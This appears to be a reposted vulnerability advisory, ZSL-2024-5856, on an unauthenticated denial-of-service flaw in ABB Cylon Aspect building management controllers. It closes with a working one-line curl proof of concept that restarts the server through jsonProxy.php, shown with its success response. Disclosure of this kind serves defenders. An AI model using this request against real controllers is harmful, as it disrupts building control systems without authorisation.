ABB Cylon Aspect 3.08.01 jsonProxy.php Denial Of Service

ABB Cylon Aspect 3.08.01 jsonProxy.php Denial Of Service
2024-10-30 23:28:30 Author: packetstormsecurity.com(查看原文) 阅读量:1 收藏

ABB Cylon Aspect 3.08.01 (jsonProxy.php) Denial of ServiceVendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The jsonProxy.php endpoint on the ABB BMS/BAS controller is vulnerable
to an unauthenticated Denial of Service (DoS) attack. An attacker can remotely
restart the main Java server by accessing the FTControlServlet with the restart
parameter. The endpoint proxies requests to localhost without requiring authentication,
enabling attackers to disrupt system availability by repeatedly triggering server
restarts.
Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
Advisory ID: ZSL-2024-5856
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5856.php
21.04.2024
--
$ cat project
                 P   R   O   J   E   C   T
                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               $ curl "http://192.168.73.31/jsonProxy.php?port=7226&application=FTControlServlet?restart=1"
<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
文章来源: https://packetstormsecurity.com/files/182404/ZSL-2024-5856.txt
如有侵权请联系:admin#unsafe.sh